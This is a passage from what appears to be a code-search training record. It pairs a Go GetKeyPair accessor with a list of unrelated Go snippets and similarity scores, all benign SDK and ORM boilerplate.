SetBunqPaymentId(v string) {\n\to.BunqPaymentId.Set(&v)\n}", "func (oumuo *OrgUnitMemberUpdateOne) SetBelongToOrgUnit(o *OrgUnit) *OrgUnitMemberUpdateOne {\n\treturn oumuo.SetBelongToOrgUnitID(o.ID)\n}", "func (s *Accessor) SetBillingToken(v string) *Accessor {\n\ts.BillingToken = &v\n\treturn s\n}", "func (s *CreateOrganizationalUnitOutput) SetOrganizationalUnit(v *OrganizationalUnit) *CreateOrganizationalUnitOutput {\n\ts.OrganizationalUnit = v\n\treturn s\n}", "func (o ClusterNodeGroupSubscriptionConfigPtrOutput) PaymentDurationUnit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *ClusterNodeGroupSubscriptionConfig) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.PaymentDurationUnit\n\t}).(pulumi.StringPtrOutput)\n}", "func (o *GetReceiptsParams) SetOrganizationalUnit(organizationalUnit *string) {\n\to.OrganizationalUnit = organizationalUnit\n}", "func (o *ReservationModel) SetUnitGroup(v EmbeddedUnitGroupModel) {\n\to.UnitGroup = v\n}", "func NewRackUnitPersonality(classId string, objectType string) *RackUnitPersonality {\n\tthis := RackUnitPersonality{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func withOrgUnitMember(node *OrgUnitMember) orgunitmemberOption {\n\treturn func(m *OrgUnitMemberMutation) {\n\t\tm.oldValue = func(context.Context) (*OrgUnitMember, error) {\n\t\t\treturn node, nil\n\t\t}\n\t\tm.id = &node.ID\n\t}\n}", "func (_IndividuallyCappedCrowdsaleImpl *IndividuallyCappedCrowdsaleImplTransactor) SetGroupCap(opts *bind.TransactOpts, _beneficiaries []common.Address, _cap *big.Int) (*types.Transaction, error) {\n\treturn _IndividuallyCappedCrowdsaleImpl.contract.Transact(opts, \"setGroupCap\", _beneficiaries, _cap)\n}", "func (oumu *OrgUnitMemberUpdate) ClearBelongToOrgUnit() *OrgUnitMemberUpdate {\n\toumu.mutation.ClearBelongToOrgUnit()\n\treturn oumu\n}", "func (b *ClusterBuilder) BillingModel(value BillingModel) *ClusterBuilder {\n\tb.billingModel = value\n\tb.bitmap_ |= 1024\n\treturn b\n}", "func (p *PerformanceDataPoint) SetUnit(unit string) *PerformanceDataPoint {\n\tp.Unit = unit\n\treturn p\n}", "func (v *Txn) Setb(json []byte) (resp *api.Assigned, err error) {\n\treturn v.Mutate(&api.Mutation{\n\t\tSetJson: json,\n\t})\n}", "func (b *AddonInstallationBuilder) Billing(value *AddonInstallationBillingBuilder) *AddonInstallationBuilder {\n\tb.billing = value\n\tif value != nil {\n\t\tb.bitmap_ |= 32\n\t} else {\n\t\tb.bitmap_ &^= 32\n\t}\n\treturn b\n}", "func (s *TtlDuration) SetUnit(v string) *TtlDuration {\n\ts.Unit = &v\n\treturn s\n}", "func (_BaseContentSpace *BaseContentSpaceTransactor) SetAddressKMS(opts *bind.TransactOpts, address_KMS common.Address) (*types.Transaction, error) {\n\treturn _BaseContentSpace.contract.Transact(opts, \"setAddressKMS\", address_KMS)\n}", "func (k Keeper) SetOwnerGateway(ctx sdk.Context, owner sdk.AccAddress, moniker string) {\n\tstore := ctx.KVStore(k.storeKey)\n\tbz := k.cdc.MustMarshalBinaryLengthPrefixed(moniker)\n\n\t// set KeyOwnerGateway\n\tstore.Set(KeyOwnerGateway(owner, moniker), bz)\n}", "func (o *TransactionSplit) UnsetBunqPaymentId() {\n\to.BunqPaymentId.Unset()\n}", "func (s *DescribeOrganizationalUnitOutput) SetOrganizationalUnit(v *OrganizationalUnit) *DescribeOrganizationalUnitOutput {\n\ts.OrganizationalUnit = v\n\treturn s\n}", "func NewAdministrativeUnitsAdministrativeUnitItemRequestBuilder(rawUrl string, requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter)(*AdministrativeUnitsAdministrativeUnitItemRequestBuilder) {\n urlParams := make(map[string]string)\n urlParams[\"request-raw-url\"] = rawUrl\n return NewAdministrativeUnitsAdministrativeUnitItemRequestBuilderInternal(urlParams, requestAdapter)\n}", "func (as AccountStorage) SetReward(ctx sdk.Context, accKey types.AccountKey, reward *Reward) sdk.Error {\n\tstore := ctx.KVStore(as.key)\n\trewardByte, err := as.cdc.MarshalJSON(*reward)\n\tif err != nil {\n\t\treturn ErrFailedToMarshalReward(err)\n\t}\n\tstore.Set(getRewardKey(accKey), rewardByte)\n\treturn nil\n}", "func (a *Meta_UsState) Set(fieldName string, value interface{}) {\n\tif a.AdditionalProperties == nil {\n\t\ta.AdditionalProperties = make(map[string]interface{})\n\t}\n\ta.AdditionalProperties[fieldName] = value\n}", "func (s *UpdateOrganizationalUnitOutput) SetOrganizationalUnit(v *OrganizationalUnit) *UpdateOrganizationalUnitOutput {\n\ts.OrganizationalUnit = v\n\treturn s\n}", "func (o ClusterSubscriptionConfigOutput) PaymentDurationUnit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterSubscriptionConfig) string { return v.PaymentDurationUnit }).(pulumi.StringOutput)\n}", "func (m *OrgUnitMemberMutation) ResetOrgUnitID() {\n\tm.belongToOrgUnit = nil\n}", "func (b *EducationSchoolRequestBuilder) AdministrativeUnit() *AdministrativeUnitRequestBuilder {\n\tbb := &AdministrativeUnitRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/administrativeUnit\"\n\treturn bb\n}", "func (o *UpdateOrganizationBillingAddressParams) WithAddressResource(addressResource *api_models.OrganizationAddress) *UpdateOrganizationBillingAddressParams {\n\to.SetAddressResource(addressResource)\n\treturn o\n}", "func (bm *BoxMüller) SetMu(x float64) {\n\tbm.mu = x\n}", "func (o ClusterSubscriptionConfigPtrOutput) PaymentDurationUnit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *ClusterSubscriptionConfig) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.PaymentDurationUnit\n\t}).(pulumi.StringPtrOutput)\n}", "func BindTextureUnit(unit uint32, texture uint32) {\n\tC.glowBindTextureUnit(gpBindTextureUnit, (C.GLuint)(unit), (C.GLuint)(texture))\n}", "func BindTextureUnit(unit uint32, texture uint32) {\n\tC.glowBindTextureUnit(gpBindTextureUnit, (C.GLuint)(unit), (C.GLuint)(texture))\n}", "func (a *Account) UpdateBillingEmail(tx *storage.Connection, newName string) error {\n\tif newName == \"\" {\n\t\treturn errors.New(\"Error: invalid E-Mail\")\n\t}\n\ta.BillingEmail = newName\n\treturn tx.UpdateOnly(a, \"billing_email\", \"updated_at\")\n}", "func (_BaseContent *BaseContentTransactor) SetAddressKMS(opts *bind.TransactOpts, address_KMS common.Address) (*types.Transaction, error) {\n\treturn _BaseContent.contract.Transact(opts, \"setAddressKMS\", address_KMS)\n}", "func (m *OrgUnitPositionMutation) ResetBelongToOrgUnit() {\n\tm.belongToOrgUnit = nil\n\tm.clearedbelongToOrgUnit = false\n}", "func (r ApiGetOrganizationShortenCountsRequest) Unit(unit TimeUnit) ApiGetOrganizationShortenCountsRequest {\n\tr.unit = &unit\n\treturn r\n}", "func (_BaseAccessWallet *BaseAccessWalletTransactor) SetAddressKMS(opts *bind.TransactOpts, address_KMS common.Address) (*types.Transaction, error) {\n\treturn _BaseAccessWallet.contract.Transact(opts, \"setAddressKMS\", address_KMS)\n}", "func setupAWS(ctx context.Context, bucket string) (*blob.Bucket, error) {\n\tc := &aws.Config{\n\t\t// Either hard-code the region or use AWS_REGION.\n\t\tRegion: aws.String(\"us-east-2\"),\n\t\t// credentials.NewEnvCredentials assumes two environment variables are\n\t\t// present:\n\t\t// 1. AWS_ACCESS_KEY_ID, and\n\t\t// 2. AWS_SECRET_ACCESS_KEY.\n\t\tCredentials: credentials.NewEnvCredentials(),\n\t}\n\ts := session.Must(session.NewSession(c))\n\treturn s3blob.OpenBucket(ctx, s, bucket)\n}", "func (oumuo *OrgUnitMemberUpdateOne) ClearBelongToOrgUnit() *OrgUnitMemberUpdateOne {\n\toumuo.mutation.ClearBelongToOrgUnit()\n\treturn oumuo\n}", "func (s *CreateAccessorOutput) SetBillingToken(v string) *CreateAccessorOutput {\n\ts.BillingToken = &v\n\treturn s\n}", "func (m *BillMutation) SetBillingstatusID(id int) {\n\tm._Billingstatus = &id\n}", "func (oumu *OrgUnitMemberUpdate) SetOrgUnitID(i int) *OrgUnitMemberUpdate {\n\toumu.mutation.SetOrgUnitID(i)\n\treturn oumu\n}", "func (m *BillingstatusMutation) ResetBillingstatuss() {\n\tm.billingstatuss = nil\n\tm.removedbillingstatuss = nil\n}", "func BindTextureUnit(unit uint32, texture uint32) {\n\tsyscall.Syscall(gpBindTextureUnit, 2, uintptr(unit), uintptr(texture), 0)\n}" ]
[ "0.6953648", "0.5890108", "0.57229763", "0.5057883", "0.48786855", "0.48318487", "0.47494823", "0.47168577", "0.46298307", "0.46166262", "0.45543838", "0.4532828", "0.4531902", "0.4530853", "0.44759083", "0.4474687", "0.44626573", "0.4447421", "0.44248983", "0.44183716", "0.4407508", "0.4384946", "0.43818235", "0.43790397", "0.43613538", "0.4343453", "0.4331093", "0.4310349", "0.42799702", "0.42797375", "0.42439806", "0.42394936", "0.4218486", "0.42090067", "0.42010665", "0.41877803", "0.41627532", "0.41479465", "0.41459846", "0.4145235", "0.40984085", "0.40902218", "0.40852532", "0.40647507", "0.40594658", "0.4056777", "0.40524405", "0.4045724", "0.40338916", "0.40051526", "0.4000332", "0.3997584", "0.39898276", "0.3984598", "0.3983511", "0.3982435", "0.39798298", "0.3971634", "0.39714155", "0.3959445", "0.3942339", "0.3940743", "0.3934728", "0.39253026", "0.39189908", "0.3914674", "0.39102527", "0.39088345", "0.39082733", "0.39059433", "0.3905882", "0.39051142", "0.38958502", "0.3894132", "0.38928348", "0.3891208", "0.38902175", "0.38809562", "0.38741627", "0.38718295", "0.38687152", "0.3863432", "0.38592374", "0.38511282", "0.38440967", "0.38437113", "0.38375425", "0.38375425", "0.38334352", "0.38325784", "0.38241678", "0.38189408", "0.38119188", "0.3797927", "0.3794813", "0.37935713", "0.37907767", "0.37894598", "0.37671995", "0.37654355" ]
0.78634876
0
GetKeyPair returns the KeyPair field value if set, zero value otherwise.
func (o *CloudAwsVirtualMachineAllOf) GetKeyPair() CloudAwsKeyPairRelationship { if o == nil || o.KeyPair == nil { var ret CloudAwsKeyPairRelationship return ret } return *o.KeyPair }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (client *Client) GetKeyPair(id string) (*model.KeyPair, error) {\n\treturn client.feclt.GetKeyPair(id)\n}", "func (client *Client) GetKeyPair(id string) (*model.KeyPair, error) {\n\treturn client.osclt.GetKeyPair(id)\n}", "func (o *CloudAwsVirtualMachineAllOf) GetKeyPairOk() (*CloudAwsKeyPairRelationship, bool) {\n\tif o == nil || o.KeyPair == nil {\n\t\treturn nil, false\n\t}\n\treturn o.KeyPair, true\n}", "func GetKeyPair(version *avatar.Version) (avatar.KeyPair, error) {\n\t// zero out the Revision field since it is irrelevant to client keys:\n\tv := avatar.Version{version.Major, version.Minor, version.Patch, 0}\n\n\tif pair, ok := keys[v]; ok {\n\t\treturn pair, nil\n\t}\n\n\treturn *emptyPair, errors.New(\"unsupported version\")\n}", "func (o InstanceOutput) KeyPair() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringPtrOutput { return v.KeyPair }).(pulumi.StringPtrOutput)\n}", "func KeyPair() (publicKey, privateKey []byte, err error) {\n\treturn defaultPH.KeyPair()\n}", "func (e *Cryptopia) GetPair(key string) *pair.Pair {\n\treturn nil\n}", "func (p *ph) KeyPair() (publicKey, privateKey []byte, err error) {\n\tsecretKey, err := randomBytes(p._SKLEN)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tpublicKey, err = p.PubKey(secretKey)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn publicKey, secretKey, nil\n}", "func (vdb *VspDatabase) KeyPair() (ed25519.PrivateKey, ed25519.PublicKey, error) {\n\tvar seed []byte\n\terr := vdb.db.View(func(tx *bolt.Tx) error {\n\t\tvspBkt := tx.Bucket(vspBktK)\n\n\t\ts := vspBkt.Get(privateKeyK)\n\n\t\t// Byte slices returned from Bolt are only valid during a transaction.\n\t\t// Need to make a copy.\n\t\tseed = make([]byte, len(s))\n\t\tcopy(seed, s)\n\n\t\tif seed == nil {\n\t\t\t// should not happen\n\t\t\treturn fmt.Errorf(\"no private key found\")\n\t\t}\n\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tsignKey := ed25519.NewKeyFromSeed(seed)\n\n\t// Derive pubKey from signKey\n\tpubKey, ok := signKey.Public().(ed25519.PublicKey)\n\tif !ok {\n\t\treturn nil, nil, fmt.Errorf(\"failed to cast signing key: %T\", pubKey)\n\t}\n\n\treturn signKey, pubKey, err\n}", "func (c *Client) Get(key string) (*model.KeyPair, error) {\n\n\t// Create a pointer to a keypair\n\tvar keypair *model.KeyPair\n\n\t// Call the Get function and\n\terr := c.connection.Call(\"RPC.Get\", key, &keypair)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn keypair, nil\n}", "func (p *Provider) GetKeyPair() (_ tls.Certificate, err error) {\n\tif p.key == nil {\n\t\treturn tls.Certificate{}, ErrKeyRequired\n\t}\n\n\tvar block []byte\n\tvar certs bytes.Buffer\n\tfor i, asn1Data := range p.chain.Certificate {\n\t\tvar crt *x509.Certificate\n\t\tif crt, err = x509.ParseCertificate(asn1Data); err != nil {\n\t\t\treturn tls.Certificate{}, fmt.Errorf(\"could not parse certificate %d: %s\", i, err)\n\t\t}\n\n\t\tif block, err = PEMEncodeCertificate(crt); err != nil {\n\t\t\treturn tls.Certificate{}, fmt.Errorf(\"could not encode certificate %d: %s\", i, err)\n\t\t}\n\n\t\tcerts.Write(block)\n\t}\n\n\tvar key []byte\n\tif key, err = PEMEncodePrivateKey(p.key); err != nil {\n\t\treturn tls.Certificate{}, err\n\t}\n\n\treturn tls.X509KeyPair(certs.Bytes(), key)\n}", "func KeyPair() (*[PUBLICKEYBYTES]byte, *[SECRETKEYBYTES]byte) {\n\tpublicKey := [PUBLICKEYBYTES]byte{}\n\tprivateKey := [SECRETKEYBYTES]byte{}\n\tpublicKeyPtr := (*C.uchar)(unsafe.Pointer(&publicKey))\n\tprivateKeyPtr := (*C.uchar)(unsafe.Pointer(&privateKey))\n\tC.crypto_vrf_keypair(publicKeyPtr, privateKeyPtr)\n\treturn &publicKey, &privateKey\n}", "func GetKeyPair(file string) (string, string, error) {\n\t// read keys from file\n\t_, err := os.Stat(file)\n\tif err == nil {\n\t\tpriv, err := ioutil.ReadFile(file)\n\t\tif err != nil {\n\t\t\tlumber.Debug(\"Failed to read file - %s\", err)\n\t\t\tgoto genKeys\n\t\t}\n\t\tpub, err := ioutil.ReadFile(file + \".pub\")\n\t\tif err != nil {\n\t\t\tlumber.Debug(\"Failed to read pub file - %s\", err)\n\t\t\tgoto genKeys\n\t\t}\n\t\treturn string(pub), string(priv), nil\n\t}\n\n\t// generate keys and save to file\ngenKeys:\n\tpub, priv, err := GenKeyPair()\n\terr = ioutil.WriteFile(file, []byte(priv), 0600)\n\tif err != nil {\n\t\treturn \"\", \"\", fmt.Errorf(\"Failed to write file - %s\", err)\n\t}\n\terr = ioutil.WriteFile(file+\".pub\", []byte(pub), 0644)\n\tif err != nil {\n\t\treturn \"\", \"\", fmt.Errorf(\"Failed to write pub file - %s\", err)\n\t}\n\n\treturn pub, priv, nil\n}", "func NewKeyPair() (*keyPair, error) {\n\tprivKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tprivKey.Precompute()\n\n\tpubKey := &privKey.PublicKey\n\treturn &keyPair{Private: privKey, Public: pubKey}, nil\n}", "func GetKeyPair(file string) (string, string, error) {\n\t// read keys from file\n\t_, err := os.Stat(file)\n\tif err == nil {\n\t\tpriv, err := ioutil.ReadFile(file)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Failed to read file - %s\", err)\n\t\t\tgoto genKeys\n\t\t}\n\t\tpub, err := ioutil.ReadFile(file + \".pub\")\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Failed to read pub file - %s\", err)\n\t\t\tgoto genKeys\n\t\t}\n\t\treturn string(pub), string(priv), nil\n\t}\n\n\t// generate keys and save to file\ngenKeys:\n\tpub, priv, err := GenKeyPair()\n\terr = ioutil.WriteFile(file, []byte(priv), 0600)\n\tif err != nil {\n\t\treturn \"\", \"\", fmt.Errorf(\"Failed to write file - %s\", err)\n\t}\n\terr = ioutil.WriteFile(file+\".pub\", []byte(pub), 0644)\n\tif err != nil {\n\t\treturn \"\", \"\", fmt.Errorf(\"Failed to write pub file - %s\", err)\n\t}\n\n\treturn pub, priv, nil\n}", "func (o OceanOutput) KeyPair() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Ocean) pulumi.StringPtrOutput { return v.KeyPair }).(pulumi.StringPtrOutput)\n}", "func (_m *TranslationKeyStore) GetPoisonKeyPair() (*keys.Keypair, error) {\n\tret := _m.Called()\n\n\tvar r0 *keys.Keypair\n\tif rf, ok := ret.Get(0).(func() *keys.Keypair); ok {\n\t\tr0 = rf()\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*keys.Keypair)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func() error); ok {\n\t\tr1 = rf()\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (c *CertInfo) KeyPair() tls.Certificate {\n\treturn c.keypair\n}", "func (w *Whisper) NewKeyPair() (string, error) {\n\tkey, err := crypto.GenerateKey()\n\tif err != nil || !validatePrivateKey(key) {\n\t\tkey, err = crypto.GenerateKey() // retry once\n\t}\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif !validatePrivateKey(key) {\n\t\treturn \"\", fmt.Errorf(\"failed to generate valid key\")\n\t}\n\n\tid, err := GenerateRandomID()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to generate ID: %s\", err)\n\t}\n\n\tw.keyMu.Lock()\n\tdefer w.keyMu.Unlock()\n\n\tif w.privateKeys[id] != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to generate unique ID\")\n\t}\n\tw.privateKeys[id] = key\n\treturn id, nil\n}", "func (hd *HDWallet) KeyPair() (ed25519.PrivateKey, ed25519.PublicKey) {\n\n\tpath, err := bip32path.ParsePath(fmt.Sprintf(pathString, hd.index))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tcurve := eddsa.Ed25519()\n\tkey, err := slip10.DeriveKeyFromPath(hd.seed, curve, path)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tpubKey, privKey := key.Key.(eddsa.Seed).Ed25519Key()\n\n\treturn ed25519.PrivateKey(privKey), ed25519.PublicKey(pubKey)\n}", "func (o *CloudAwsVirtualMachineAllOf) HasKeyPair() bool {\n\tif o != nil && o.KeyPair != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func NewKeyPair(rootKey RootKeyable, chainKey ChainKeyable) *KeyPair {\n\tkeyPair := KeyPair{\n\t\tRootKey: rootKey,\n\t\tChainKey: chainKey,\n\t}\n\n\treturn &keyPair\n}", "func (a *Client) GetKeypair(params *GetKeypairParams, authInfo runtime.ClientAuthInfoWriter) (*GetKeypairOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewGetKeypairParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"getKeypair\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/keypair\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\"},\n\t\tParams: params,\n\t\tReader: &GetKeypairReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*GetKeypairOK), nil\n\n}", "func (p PrivateKey) calculateKeyPair() ([]byte, *edwards25519.Scalar, error) {\n\tvar pA edwards25519.Point\n\tvar sa edwards25519.Scalar\n\n\tk, err := (&edwards25519.Scalar{}).SetBytesWithClamping(p)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tpub := pA.ScalarBaseMult(k).Bytes()\n\tsignBit := (pub[31] & 0x80) >> 7\n\n\tif signBit == 1 {\n\t\tsa.Negate(k)\n\t\t// Set sig bit to 0\n\t\tpub[31] &= 0x7F\n\t} else {\n\t\tsa.Set(k)\n\t}\n\n\treturn pub, &sa, nil\n}", "func GenerateKeyPair() (*rsa.PrivateKey, *rsa.PublicKey, error) {\n\tprivKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn privKey, &privKey.PublicKey, nil\n}", "func GetAccountKeyPairFor(name string) (string, string) {\n\n\tar := AccountsRepository()\n\tpk1, ok := ar.publicKey[name]\n\tvar puk, prk string\n\tif ok {\n\t\tpuk = pk1\n\t} else {\n\t\tpuk = \"\"\n\t}\n\tpk2, ok := ar.privateKey[name]\n\tif ok {\n\t\tprk = pk2\n\t} else {\n\t\tprk = \"\"\n\t}\n\treturn puk, prk\n}", "func (k *KeyPair) GetID() (peer.ID, error) {\n\treturn peer.IDFromPublicKey(k.GetPublicKey())\n}", "func GenerateKeyPair() *rsa.PrivateKey {\n\n\tprivateKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\n\tif err != nil {\n\t\tlog.Fatal(\"Error in generating key-value pair, error is\", err)\n\t}\n\treturn privateKey\n}", "func NewKeyPair() (ecdsa.PrivateKey, []byte) {\n\tellipticCurve := EllipticCurve()\n\n\tprivateKey, err := ecdsa.GenerateKey(ellipticCurve, rand.Reader)\n\tif err != nil {\n\t\tlog.Panic(err)\n\t}\n\tX := privateKey.PublicKey.X.Bytes()\n\tY := privateKey.PublicKey.Y.Bytes()\n\t//fmt.Println(len(X), X)\n\t//fmt.Println(len(Y), Y)\n\tpublicKey := append(\n\t\tX, // 32 bytes (P256)\n\t\tY..., // 32 bytes (P256)\n\t) // 64 bytes => 64 * 8 bits = 512 bits (perchè usiamo P256 o secp256k)\n\treturn *privateKey, publicKey\n}", "func (o *CloudAwsVirtualMachineAllOf) SetKeyPair(v CloudAwsKeyPairRelationship) {\n\to.KeyPair = &v\n}", "func NewKeyPair(suite suites.Suite, random cipher.Stream) (kyber.Scalar, kyber.Point) {\n\tx := suite.G2().Scalar().Pick(random)\n\tX := suite.G2().Point().Mul(x, nil)\n\treturn x, X\n}", "func (w *Whisper) HasKeyPair(id string) bool {\n\tw.keyMu.RLock()\n\tdefer w.keyMu.RUnlock()\n\treturn w.privateKeys[id] != nil\n}", "func GenerateKeyPair() ([]byte, []byte) {\n\tconst seckeyLen = 32\n\tvar seckey []byte\n\tvar pubkey []byte\n\nnew_seckey:\n\tseckey = RandByte(seckeyLen)\n\tif secp.SeckeyIsValid(seckey) != 1 {\n\t\tgoto new_seckey // regen\n\t}\n\n\tpubkey = pubkeyFromSeckey(seckey)\n\tif pubkey == nil {\n\t\tlog.Panic(\"IMPOSSIBLE: pubkey invalid from valid seckey\")\n\t\tgoto new_seckey\n\t}\n\tif ret := secp.PubkeyIsValid(pubkey); ret != 1 {\n\t\tlog.Panicf(\"ERROR: Pubkey invalid, ret=%d\", ret)\n\t\tgoto new_seckey\n\t}\n\n\treturn pubkey, seckey\n}", "func generateKeyPair() (publicKey, privateKey *[32]byte, err error) {\n\treturn box.GenerateKey(rand.Reader)\n}", "func GenerateKeyPair() (pubkey, privkey []byte) {\n\tkey, err := ecdsa.GenerateKey(secp256k1.S256(), rand.Reader)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tpubkey = elliptic.Marshal(secp256k1.S256(), key.X, key.Y)\n\tprivkey = make([]byte, 32)\n\tblob := key.D.Bytes()\n\tcopy(privkey[32-len(blob):], blob)\n\treturn\n}", "func GetSSHKeyPair(secrets interface {\n\tGet(organizationID uint, secretID string) (*secret.SecretItemResponse, error)\n}, organizationID uint, sshSecretID string,\n) (ssh.KeyPair, error) {\n\tsir, err := secrets.Get(organizationID, sshSecretID)\n\tif err != nil {\n\t\treturn ssh.KeyPair{}, err\n\t}\n\treturn sshadapter.KeyPairFromSecret(sir), nil\n}", "func (o *PipelineSshKeyPairAllOf) GetPrivateKeyOk() (*string, bool) {\n\tif o == nil || o.PrivateKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.PrivateKey, true\n}", "func (o *PipelineSshKeyPairAllOf) GetPrivateKey() string {\n\tif o == nil || o.PrivateKey == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.PrivateKey\n}", "func GenerateKeyPair() (*ecdsa.PrivateKey, error ) {\n\tkey, err := ecdsa.GenerateKey(btcec.S256(), rand.Reader)\n\tif err != nil { return nil, err } \n\treturn key, nil\n}", "func (n *nauth) GenerateKeyPair(passphrase string) ([]byte, []byte, error) {\n\tpriv, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tprivDer := x509.MarshalPKCS1PrivateKey(priv)\n\tprivBlock := pem.Block{\n\t\tType: \"RSA PRIVATE KEY\",\n\t\tHeaders: nil,\n\t\tBytes: privDer,\n\t}\n\tprivPem := pem.EncodeToMemory(&privBlock)\n\n\tpub, err := ssh.NewPublicKey(&priv.PublicKey)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tpubBytes := ssh.MarshalAuthorizedKey(pub)\n\treturn privPem, pubBytes, nil\n}", "func (m *_KeyValuePair) GetKey() QualifiedName {\n\treturn m.Key\n}", "func NewKeyPair(pub crypto.PublicKey, privArmor string) KeyPair {\n\treturn KeyPair{\n\t\tPublicKey: pub,\n\t\tPrivKeyArmor: privArmor,\n\t}\n}", "func (s *SkyСoinService) GenerateKeyPair() *KeysResponse {\n\tseed := getRand()\n\trand.Read(seed)\n\tpub, sec := cipher.GenerateDeterministicKeyPair(seed)\n\treturn &KeysResponse{\n\t\tPrivate: sec.Hex(),\n\t\tPublic: pub.Hex(),\n\t}\n}", "func (p *Pair) Get(key string) (value interface{}, found bool) {\n\tif p == nil {\n\t\treturn\n\t}\n\n\tif p.key == key {\n\t\treturn p.value, true\n\t}\n\n\tif p.prev == nil {\n\t\treturn\n\t}\n\n\treturn p.prev.Get(key)\n}", "func GetPlaybackKeyPair(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *PlaybackKeyPairState, opts ...pulumi.ResourceOption) (*PlaybackKeyPair, error) {\n\tvar resource PlaybackKeyPair\n\terr := ctx.ReadResource(\"aws:ivs/playbackKeyPair:PlaybackKeyPair\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GenerateKeyPair(group *schnorr.Group) (*SecKey, *PubKey) {\n\ts1 := common.GetRandomInt(group.Q)\n\ts2 := common.GetRandomInt(group.Q)\n\th1 := group.Exp(group.G, s1)\n\th2 := group.Exp(group.G, s2)\n\n\treturn NewSecKey(s1, s2), NewPubKey(h1, h2)\n}", "func TestingKeyPair() *CertInfo {\n\tkeypair, err := tls.X509KeyPair(testCertPEMBlock, testKeyPEMBlock)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"invalid X509 keypair material: %v\", err))\n\t}\n\n\tcert := &CertInfo{\n\t\tkeypair: keypair,\n\t}\n\n\treturn cert\n}", "func (n *nauth) GetNewKeyPairFromPool() ([]byte, []byte, error) {\n\tselect {\n\tcase key := <-n.generatedKeysC:\n\t\treturn key.privPem, key.pubBytes, nil\n\tdefault:\n\t\treturn n.GenerateKeyPair(\"\")\n\t}\n}", "func (s stack) InspectKeyPair(ctx context.Context, id string) (*abstract.KeyPair, fail.Error) {\n\treturn nil, fail.NotImplementedError(\"InspectKeyPair() not implemented yet\") // FIXME: Technical debt\n}", "func (k *KeyPair) GetPrivateKey() p2pCrypto.PrivKey {\n\treturn k.privKey\n}", "func (client *Client) DeleteKeyPair(id string) error {\n\treturn client.feclt.DeleteKeyPair(id)\n}", "func (s *State) PendingKeyExchangeIdentityKeyPair() *identity.KeyPair {\n\treturn s.pendingKeyExchange.localIdentityKeyPair\n}", "func (d Dispatcher) KeyPair() (string, error) {\n\tpriv, pub := crypt.GenKeys()\n\ttemp := make(map[string]string)\n\ttemp[\"priv\"] = priv\n\ttemp[\"pub\"] = pub\n\tkeysBytes, err := helpers.Serialize(temp)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn string(keysBytes), nil\n}", "func (b *Base) GenerateKeyPair(req *GenerateKeyPairReq) (*GenerateKeyPairResp, error) {\n\treturn nil, ErrFunctionNotSupported\n}", "func GenerateKeypair() (privkey, pubkey []byte, err error) {\n\tpair, err := noise.DH25519.GenerateKeypair(rand.Reader)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\t// pair.Public is already filled in; assert here that PubkeyFromPrivkey\n\t// agrees with it.\n\tderivedPubkey := PubkeyFromPrivkey(pair.Private)\n\tif !bytes.Equal(derivedPubkey, pair.Public) {\n\t\tpanic(fmt.Sprintf(\"expected pubkey %x, got %x\", derivedPubkey, pair.Public))\n\t}\n\n\treturn pair.Private, pair.Public, nil\n}", "func (ls KvPairs) Get(key string) (Bytex, bool) {\n\n\tkvp_mu.RLock()\n\tdefer 